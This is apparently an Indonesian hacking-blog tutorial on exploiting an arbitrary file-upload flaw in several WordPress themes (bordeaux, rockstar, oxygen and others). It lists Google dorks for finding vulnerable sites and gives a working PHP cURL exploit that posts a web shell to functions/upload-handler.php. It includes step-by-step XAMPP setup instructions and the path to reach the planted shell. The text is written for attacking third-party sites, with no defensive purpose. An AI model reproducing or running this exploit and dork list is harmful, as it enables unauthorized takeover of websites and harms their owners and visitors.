Alhamdulillah :D
Oke , tanpa basa-basi , langsung saja .
Pertama , Karena Judulnya orange themes File Upload , Maka ada beberapa Themes yang Sama Vuln dengan itu ,
inurl:"/wp-content/themes/bordeaux-theme/"inurl:"/wp-content/themes/bulteno-theme/"inurl:"/wp-content/themes/oxygen-theme/"inurl:"/wp-content/themes/radial-theme/"inurl:"/wp-content/themes/rayoflight-theme/"inurl:"/wp-content/themes/reganto-theme/"inurl:"/wp-content/themes/rockstar-theme/"
Sekarang , Gunakan 1 Dork Di atas .Saya akan mengambil 1 Dork . Yaitu :inurl:"/wp-content/themes/bordeaux-theme/"Lalu , Jika Sudah dapat kan target , ex: www.site.com/wp-content/themes/bordeux-theme/Anda tambahkan Vuln nya , /functions/upload-handler.phpMaka targetnya akan menjadi www.site.com/wp-content/themes/bordeux-theme/functions/upload-handler.phpJika Keluar Error maka Site Itu Vuln :Dnah Sebelum mengeksekusikan Target ini , yang anda butuh kan adalah :Xammp , Anda bisa download XAMMP di google, saya rasa sudah banyak bertebaran , lalu Install .Jika Sudah , Buka Folder Xammp > terus buka lagi Folder PHP , Dan cari code PHP.INI , Tekan Control + F / CTRL + F , Ketikkan curl Lalu enter , jika ketemu Delete (;) Tanpa tanda kurung () , Lalu Jika tidak menemukan tanda ; ini berarti kamu sudah succes ..Letakkan Shell Anda di Folder Xammp - Folder PHP , contoh Shell ex : up.php
Jika 3 cara diatas sudah selesai sekarang kita akan Mengeksekusikan Target ..Copykan Exploit ini <?php $uploadfile="upload.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>Dan Save dengan extention .php , Disini saya akan save dengan File bernama x.php , Simpan di dekat Folder Xammp - Folder PHP ..Tepat dimana anda letak Shell anda tadi ..Ingat , nama shell saya ada up.php Maka di bagian exploit tadi $uploadfile="upload.php"; <-- upload.php rename menjadi up.php
Jika sudah Save Kembali :))
Sekarang .
Buka Xammp Anda , Disini Jika xammp anda termasuk Versi lama , maka anda harus masuk ke folder xammp nya langsung
Cara nya
ketik : cd\ Lalu tekan Enter Lalu Jika CMD anda kembali ke System C atau seperti iniC:\Documents and Settings\Alliance>cd\
C:\>Maka sudah berhasil , Sekarang selanjutnya tekan cd /xammp/php tekan EnterJika Sudah Jlankan Exploitnya , tadi nama Exploit saya adalah x.php maka cara menjalankannya seperti ini ..cd:\xammp\php\>: php x.php Dan tekan Enter ..Jika Keluar tulisan nama shell anda di CMD atau Command Promd tadi maka SUCCES xDShell acces , www.site.com/wp-content/uploads/2013/11/up.phpJika masih bingung , Kamu bisa Commentar di blog ini .:)
Sumber : http://dumaicodes.blogspot.com